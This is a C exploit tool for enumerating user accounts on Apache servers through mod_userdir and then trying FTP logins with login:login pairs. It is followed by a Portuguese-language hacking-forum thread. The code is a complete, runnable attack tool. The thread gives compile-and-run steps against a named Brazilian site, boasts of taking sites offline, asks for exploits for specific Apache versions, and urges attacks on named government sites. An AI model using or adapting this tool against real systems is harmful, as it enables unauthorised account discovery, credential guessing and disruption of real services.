* This is old, but curentlly still actual problem, because 99% of all admins use
* default configuration of apache http server.
*
* This tool scans remote hosts with httpd (apache) and disclosure information
* about existens users accounts via wrong default configuration of mod_userdir
* (default apache module). Then attempts to log on ftp with found logins.
*
* -d4rkgr3y
*
* sh-2.05b$ ./m00-apache-w00t -t localhost -u test_userlist.txt -b
*
* [*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.
*
* [*] Checking http server [localhost:80]...
* Apache => yes
* Vulnerable => yes
* OS => Mandrake Linux
* [*] Searching for system accounts...
* sergey =>
* m00 =>
* satan => yes
* evil =>
* poison =>
* god =>
* guest =>
* dima =>
* ftp => yes
* vasya =>
* rst =>
* vasi =>
* [*] Searching complete.
* 12 users checked
* 2 users found
* [*] Attempting to log on ftp with login:login...
* satan:satan => no
* ftp:ftp => no
* [*] Complete.
* 0 ftp accounts found
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

#define DEFAULT_HTTP_PORT 80
#define DEFAULT_FTP_PORT 21

int m00() {
printf("\n[*] Apache 1.3.*-2.0.48 remote users disclosure exploit by m00 Security.\n\n");
printf("\n[*] Downloaded on www.K-OTIK.com\n\n");
}

int verbose(char *d) {
printf("+-----------------------o0o-----------------------+\n");
printf("\n%s",d);
printf("+-----------------------o0o-----------------------+\n");
}

int usage(char *xplname) {
printf("[~] usage: %s -t <host> -u <userlist> [options]\n\n",xplname);
printf("Options:\n");
printf("-p <port> - http port [80]\n");
printf("-l <log_file> - log all attempts to file\n");
printf("-b - try to log on ftp with guessed logins (public version only login:login)\n");
printf("-h - usage\n");
printf("\n");
exit(0);
}

int attempt(char *argv);

int conn(char *ip, unsigned short port) {
struct hostent *hs;
struct sockaddr_in sock;
int sockfd;
bzero(&sock, sizeof(sock));
sock.sin_family = AF_INET;
sock.sin_port = htons(port);
if ((sock.sin_addr.s_addr=inet_addr(ip))==-1) {
if ((hs=gethostbyname(ip))==NULL) {
perror("[-] Error"); exit(0);
}
sock.sin_family = hs->h_addrtype;
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
}
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("[-] Error"); exit(0);
}
if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
perror("[-] Error "); exit(0);
}
return(sockfd);
}


int main(int argc, char *argv[]) {
FILE *userlist, *logfile;
char *file=NULL;
char *lfile=NULL;
char *host=NULL;
char buf[0x20], check[0x20], request[0xc8], answer[0x3e8], c,logd[0x30];
int i,hand,x,f,v=0,brute=0;
int port = DEFAULT_HTTP_PORT;
int fport = DEFAULT_FTP_PORT;

char c200[0x05] =
"\x20\x32\x30\x30\x20";
char c403[0x0e] =
"\x34\x30\x33\x20\x46\x6f"
"\x72\x62\x69\x64\x64\x65\x6e";
char c404[0x0e] =
"\x34\x30\x34\x20\x4e\x6f\x74"
"\x20\x46\x6f\x75\x6e\x64";
char signature[0x0f] =
"\x53\x65\x72\x76\x65\x72\x3a"
"\x20\x41\x70\x61\x63\x68\x65";
char *http =
"Accept: */*\r\n"
"Accept-Language: en-us,en;q=0.5\r\n"
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
"User-Agent: m00-apache-finger\r\n"
"Connection: close\r\n\r\n";
char **logz;

m00();

if(argc<2) usage(argv[0]);
while((c = getopt(argc, argv, "t:u:hp:vbl:"))!= EOF) {
switch (c) {
case 't':
host=optarg;
break;
case 'u':
file=optarg;
break;
case 'p':
port=atoi(optarg);
break;
case 'l':
lfile=optarg;
break;
case 'b':
brute=1;
break;
case 'v':
v=1;
break;
case 'h':
usage(argv[0]);
return 1;
default:
usage(argv[0]);
return 1;
}
}

if(host==NULL) { usage(argv[0]); }
if(file==NULL) { usage(argv[0]); }

if(lfile && (logfile = fopen(lfile, "a")) == 0) {
printf("[-] unable to open logfile [%s]\n",lfile);
exit(0);
}

if((userlist = fopen(file, "r")) == 0) {
printf("[-] unable to open userlist [%s]\n",file);
exit(0);
}

logz = (char **)malloc(0x666);

printf("[*] Checking http server [%s:%i]...\n",host,port);

hand = conn(host,port);
sprintf(request,"HEAD /~root HTTP/1.1\r\nHost: %s\r\n%s",host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" Apache => ");
if(!strstr(answer,signature)) { printf(" no\n Vulnerable => "); } else printf(" yes\n Vulnerable => ");
if(!strstr(answer,c403)) { printf("no\n[-] Exiting...\n"); exit(0); } else printf("yes\n");
close(hand);

hand = conn(host,port);
sprintf(request,"HEAD /~toor HTTP/1.1\r\nHost: %s\r\n%s",host,http);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

printf(" OS => ");
if(strstr(answer,c403)) { printf("FreeBSD"); } else {
if(strstr(answer,"Unix")) printf("Unix unknow");
if(strstr(answer,"Debian")) printf("Debian Linux");
if(strstr(answer,"RedHat")) printf("RedHat Linux");
if(strstr(answer,"mdk")) printf("Mandrake Linux");
}
close(hand);

printf("\n[*] Searching for system accounts...");

if(lfile) {
sprintf(logd,"Host: %s\nFound accounts:\n",host);
fprintf(logfile,logd);
}

x=0;
f=0;
while (1) {
fgets(buf, 32, userlist);
if (buf[0] == '\n' || strstr(check,buf)) break;
strcpy(check,buf);
buf[strlen(buf)-1] = '\0';
x++;

printf("\n %s \t=> ",buf);


hand = conn(host,port);
sprintf(request,"HEAD /~%s HTTP/1.1\r\nHost: %s\r\n%s",buf,host,http);

write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

if(v) verbose(answer);

if(!strstr(answer,c404)) {
printf(" yes",buf);
if(lfile) {
sprintf(logd,"%s\n",buf);
fprintf(logfile,logd);
}
logz[f] = (char *)malloc(strlen(buf));
memcpy(logz[f],buf,strlen(buf));
memset(logz[f]+strlen(buf),0x0,1);
f++;
}
close(hand);
}
fclose(userlist);
printf("\n[*] Searching complete.\n");
printf(" %i users checked\n %i users found\n",x,f);
if(brute && f>0) {
x=0;
i=0;
if(lfile) {
sprintf(logd,"FTP:\n");
fprintf(logfile,logd);
}
printf("[*] Attempting to log on ftp with login:login...\n");
while(x!=f) {
printf(" %s:%s \t=>",logz[x],logz[x]);
hand = conn(host,fport);

sprintf(request,"USER %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);

sprintf(request,"PASS %s\n",logz[x]);
write(hand,request,strlen(request));
recv(hand,answer,0x3e8,0);
if(strstr(answer,"230")) {
printf(" yes\n");
if(lfile) {
sprintf(logd,"%s:%s\n",logz[x],logz[x]);
fprintf(logfile,logd);
}
i++;
} else printf(" no\n");
close(hand);
x++;
}
printf("[*] Complete.\n");
printf(" %i ftp accounts found\n",i);
}
if(lfile) {
fprintf(logfile,"\n");
fclose(logfile);
}

}
/* m00 */

// milw0rm.com [2003-12-06]
Compile-o com o gcc ("gcc arquivo.c -o arquivo"), e rode assim: ./arquivo www.invasao.com.br (http://www.invasao.com.br) wordlist.txt

Onde "wrodlist.txt" vai ser uma wordlist sua.

Boa sorte. A falha ainda está lá, e pelo visto vai ficar por muito mais tempo.

...by Cloudy

o invasao é um lixo
aquele diógenes também não manja nada
aquele site é uma vergonha não sei porque vocês querem avisar eles, esses tipos de site só fazem mau pra imagem dos 'hackers' eu acho :/

Ah, só pra avisar, foi o Slul que descobriu que o invasao tava vul a essa falha.

E outra coisa, depois disso ele saiu com o narz em pé.

Aí voltou depois falando que eu tinha que explicar a falha pra ele, pro pessoal do "provedor" poder arrumar, eu falei que tava atrasado pro jogo de Hadball, aí ele foi falando que o Darkers está no mesmo provedor, api eu disse que se tivesse que falar, falaria pro DarkGênesis, pois ele tem humildade, aí ele disse que nunca iria "nos entender". =/

Tsc tsc tsc...

...by Cloudy

po cloudy como tu eh mau sair por ai dedando a vul dos kras hahaha





foram bem cuzao e nao estao no msm server q o darkers


eles tem DNS propria provavelmente o server tbm eh proprio

ns.invasao.com.br

eu e meu amigo já deixamo o darkers off com essa brincadeirinha ae..

o invasao deixamo off a tarde intera esses dias o darkers foi só pra testa =p

Ai Slul, alguns desses exploits roda no apache 1.3.36 ? se alguem tiver algum exploit para essa versão do apache por favor me diga....

Quote from: "iorifly"Ai Slul, alguns desses exploits roda no apache 1.3.36 ? se alguem tiver algum exploit para essa versão do apache por favor me diga....

nao tenho certeza bro vc pode tentar o invasao eh 1.3.36 e tem um xpl q rodou lah

PS: n tenho certeza se eles sao 1.3.36 }} o darkers eh e os dois sao do msm server (mindnet)

nao sei se tao no msm PC

bem, prefiro não opinar a respeito do invasao.

alguem tem algum exploit p/ a versão  Apache/2.0.55 ?

rpz eu frequento o invasao gosto pra caramba do site to conhecendo esse forum agora mais tipo nada a ver exploitar o site isso pode acontecer com qualquer servidor estar vull é super normal mais uma coisa que eu achei meu foda é eles que mechem com isso o dia todo não ter corrigido mais fazer o que "Nenhum servidor é 100% seguro"

...e o invasão não é nem 10%.

Em breve vocês vão ver sobre o que estou falando.

HadeS

bem,eu não iria falar nada a respeito da tentativa de derrubar o invasão mas cm sou adm de lá e tenho consideração e admiro o darkers.
uma obeservação sobre o exploit e o video q fizeram:

1º no video mostra a abertura de pagina do invasão quando o exploit está sendo usado.
2º se limpar o cache do navegador a 1ºabertura de pagina vai demorar.
ou seja , provavelmente a cache foi limpa , rodaram op exploit q nao serve pra nada, e logico o site dependendo da conexao vai demorar a abrir.
3º depois  q o site ja esta em cache ele fecha o exploit e tenta abrir o site, logico q dessa vez o site vai abrir rapido ! aff
4º sabem realmente cm se usa um exploit? quando tiveram acesso ao root usando exploit? quando conseguiram uma MD5 e detalhe pegar a md5 é facil, mas conseguiram quebrar? 
duido q alguem derrube um site usando somente a sua conexão, temq  se usar shells varias e as shells temq  ter uma boa velocidade.

bem to parando por aki pois to cm preguiça de escrever !

só acho q brigas entre foruns ou grupos não levam a nada, quer fama? detone um site .gov , invada a nasa, porque nao tenta tirar esse site do ar?
http://www.secretservice.gov/alert419.shtml (http://www.secretservice.gov/alert419.shtml)
http://www.dpf.gov.br/ (http://www.dpf.gov.br/)

assim sim vcs conseguiriam fama !

obs: fama=facil localização = #  claro esssa obs está voltado ao nosso universo!

Quote from: "thorking"bem,eu não iria falar nada a respeito da tentativa de derrubar o invasão mas cm sou adm de lá e tenho consideração e admiro o darkers.
uma obeservação sobre o exploit e o video q fizeram:

1º no video mostra a abertura de pagina do invasão quando o exploit está sendo usado.
2º se limpar o cache do navegador a 1ºabertura de pagina vai demorar.
ou seja , provavelmente a cache foi limpa , rodaram op exploit q nao serve pra nada, e logico o site dependendo da conexao vai demorar a abrir.
3º depois  q o site ja esta em cache ele fecha o exploit e tenta abrir o site, logico q dessa vez o site vai abrir rapido ! aff
4º sabem realmente cm se usa um exploit? quando tiveram acesso ao root usando exploit? quando conseguiram uma MD5 e detalhe pegar a md5 é facil, mas conseguiram quebrar? 
duido q alguem derrube um site usando somente a sua conexão, temq  se usar shells varias e as shells temq  ter uma boa velocidade.

bem to parando por aki pois to cm preguiça de escrever !

só acho q brigas entre foruns ou grupos não levam a nada, quer fama? detone um site .gov , invada a nasa, porque nao tenta tirar esse site do ar?
http://www.secretservice.gov/alert419.shtml (http://www.secretservice.gov/alert419.shtml)
http://www.dpf.gov.br/ (http://www.dpf.gov.br/)

assim sim vcs conseguiriam fama !

obs: fama=facil localização = #  claro esssa obs está voltado ao nosso universo!

legal mais só pra avisa o ccoder tem um exploit pra vuln do apache que ele bota o invasao off sozinho =p invasao,darkers.. e muito site por ai

ai ai tio thorking nao qro brigar não afinal a culpa não é de vcs e nao quero nenhuma briga com o pessoal do invasao fui muito bem tratado quando falei de todos os bugs e falei com o diogenes e talz ele me agradeceu e talz...

espero do fundo do meu ser que ele tenha falado com o pessoal do mindnet desculpa mas minha intenção nao foi desmerecer nem retirar cr´editos do invasão.com.br que para muitos é um ótimo portal...

eu simplesmente nao gosto mas tenho esse direito né?

eu nao gosto do invasao acho que é apenas uma ferramenta para explorar adolescentes e pegar dinheiro deles...

mas como disse sem brigas todos temos direitos de gostar ou não de algo não é?

abração thorking


sem flames aqui pessoal plx

entendo slul cada um tem seu ponto de vista suas opiniões e respeito a de cada um, não se pode agradar a todos! 

mas vlw mano abração !continue cm seus bons topicos!

Acho engraçado, todo mundo fala... fala... e fazer que é bom nunca vi ninguem fazer.
Frequento o invasão sempre e nunca vi ele ficar off, o darkers idem.
Contar vantagem é facil, quero ver é fazer, marcar uma hora e derrubar.

Acho que seria melhor pararmos de falarmos mal de outros foruns, qualquer que seja a opiniao sobre eles. Sem mais essa historia...

 Otimo post, slul, ponto.